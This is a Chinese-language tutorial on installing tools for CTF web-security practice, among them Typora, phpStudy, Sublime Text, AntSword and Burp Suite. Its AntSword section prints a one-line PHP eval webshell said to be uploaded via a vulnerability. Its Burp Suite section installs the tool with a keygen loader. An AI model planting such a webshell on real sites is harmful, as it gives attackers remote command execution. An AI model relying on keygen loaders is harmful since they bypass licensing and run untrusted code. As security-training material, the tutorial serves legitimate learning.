CTF-web 常用软件安装及环境搭建
前言
工欲善其事,必先利其器
搭建web学习环境:Typora、phpStudy、python、Sublime Text、AntSword、JDK1.8、Burp Suite
此次安装是在虚拟机下的Windows10 x64操作系统下进行。
Typora
简介
官方网站:https://www.typora.io/
Typora 是一款支持实时预览的 Markdown 文本编辑器。
Markdown是一种纯文本格式的标记语言。通过简单的标记语法,它可以使普通文本内容具有一定的格式。
使用
- 图片
点击文件 -> 偏好设置,可以设置插入图片时保存的位置,如下图,这样当我们在typora中Ctrl + V粘贴时,就会把图片自动保存在当前md文档所在目录的img文件夹下,若没有该文件夹,也会自动创建。
- markdown扩展语法
可以根据自己的喜好来设置。
markdown基础语法
- 标题
语法:#(空格)标题
快捷键:ctrl + 数字
# 这是一级标题
## 这是二级标题
### 这是三级标题
#### 这是四级标题
##### 这是五级标题
###### 这是六级标题
- 加粗
语法:**加粗**
快捷键:ctrl + B
字体
**加粗的字体**
- 斜体
语法:*斜体*
快捷键:ctrl + I
字体
*斜体*
- 删除线
语法:~~文字~~
快捷键:alt + shift + %
文字
~~文字~~
- 引用
语法:>(空格)
快捷键:ctrl + shift + Q
> 引用的内容
- 代码
语法:`内容`
快捷键:ctrl + shift + `
`内容`
- 代码块
语法:```编程语言(回车)
快捷键:ctrl + shift + K
```python(回车)
- 超链接
语法:[文字](url)
快捷键:ctrl + K
[百度](https://www.baidu.com/)
- 图片
语法:
快捷键:ctrl + shift + I
- 表格
语法:略
快捷键:ctrl + T
- 行内公式
语法:$公式$
快捷键:无
$a^2 + b^2 = c^2$
- 公式块
语法:$$公式块$$
快捷键:ctrl + shift + M
$$
(2021 \times m \times 1001 \times p)^{e} \mod n = c \\
(k1 \times p) \mod n = c \\
k1 \times p = k2 \times n + c \\
k1 \times p = k3 \times p + c \\
(k1-k3) \times p = c
$$
- 有序列表
语法:数字.(空格)
快捷键:ctrl + shift + [
1. admin
2. root
- 无序列表
语法:+(空格)
快捷键:ctrl + shift + ]
+ admin
+ 编程语言
+ php
+ python
phpStudy
简介
官方网站:https://www.xp.cn/
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。
使用
- 网站根目录
安装完成之后,在安装目录下的WWW文件夹即为网站根目录
- 端口
Apache默认端口:80
MySQL默认端口:3306
如果没有更改Apache端口的话,访问http://localhost/即可,或者http://127.0.0.1/,如果更改端口需要加上端口号
- 配置本地服务器域名
在桌面新建一个文件夹php,然后点击创建网站
在php文件夹里新建index.php,编写如下代码
echo "Hello World";
?>
访问http://www.php.com/即可
- 添加环境变量
右键此电脑 -> 点击属性 -> 点击左侧的高级系统设置 -> 点击环境变量
win + R 输入 cmd 打开命令行窗口,输入php -v
python
简介
官方网站:https://www.python.org/
Python是一种计算机程序设计语言。
人生苦短,我用python。
安装
勾上Add Python 3.10 to PATH
安装完成之后,按住Win + R,输入cmd打开命令行窗口,输入python,出现如下界面说明安装成功了。
Sublime Text
简介
官方网站:https://www.sublimetext.com/
Sublime Text 是一款流行的代码编辑器软件。
汉化
使用 Ctrl + Shift + P 快捷键调出查找框,输入install,点击Package Control: Install Package
稍等一下之后在新的搜索框中输入ChineseLocalizations,安装完成之后重新打卡软件即可完成汉化。
搭建php环境
工具 -> 编辑系统 -> 新建编辑系统
复制以下内容到新出现的文件里
{
"cmd": ["php", "$file"],
"file_regex": "php$",
"selector": "source.php"
}
Ctrl + S保存为php.sublime-build
这样就可以选择php编译系统了,需要重启sublime之后才能编译
编译快捷键:Ctrl + B
搭建python环境
工具 -> 编译系统 中如果没有python选项则需要手动搭建:Sublime text 3搭建Python开发环境及常用插件安装 - honkly - 博客园 (cnblogs.com)。
如果有python选项的话直接选择即可,编译快捷键同样是Ctrl + B
AntSword
简介
官方网站:https://doc.u0u.us/zh-hans/index.html
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
安装
antSword-master.zip下载地址:https://github.com/AntSwordProject/AntSword
下载完成后解压antSword-master.zip
然后解压加载器AntSword-Loader-v4.0.3-win32-x64.zip后双击AntSword.exe
点击初始化后选择之前在GitHub下载的文件夹,进行初始化,完成之后再次双击AntSword.exe
使用
假设已通过漏洞向http://www.php.com/上传了一句话木马,文件名为hack.php
@eval($_POST['cmd']);
?>
此时可以使用蚁剑连接
这就说明能够连上,点击添加按钮即可。
JDK1.8
简介
官方网站:https://www.oracle.com/java/
JDK是 Java 语言的软件开发工具包,主要用于移动设备、嵌入式设备上的java应用程序。
安装
将压缩包解压后双击运行exe文件,然后一直点击下一步即可。
- 配置系统环境变量
Win + R 输入cmd打开命令行窗口,输入java -version和javac -version,出现如下结果表示安装成功
使用:新建Hello.java文件,编写以下代码
public class Hello {
public static void main(String[] args) {
System.out.println("Hello World");
}
}
进入命令行窗口,切换到java文件所在的位置
输入
javac Hello.java
编译Hello.java文件,此次目录下会生成Hello.class文件
输入
java Hello
运行class文件,输出Hello World
Burp Suite
简介
官方网站:https://portswigger.net/burp
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。
注:需提前配置好Java环境。
安装
双击burp-loader-keygen.jar
将License中的内容复制到右边,然后点击Next
最后点击Finish。
之后如果需要使用,直接双击burp-loader-keygen.jar,然后点击Run即可。
配置代理
需要注意burpsuite对该路径是否有写入文件的权限,可以先保存在桌面,再移动到一个新的位置保存。
点击左侧的添加按钮,标题随意,代理IP和端口需要和burpsuite的proxy的option中的一样。
在火狐浏览器的设置中导入证书
抓包
浏览器开启代理
burpsuite进行抓包拦截
在浏览器中搜索admin,url为
https://www.baidu.com/s?ie=utf-8&wd=admin
点击搜索或回车后,此次可以看到burpsuite已成功抓包该数据包
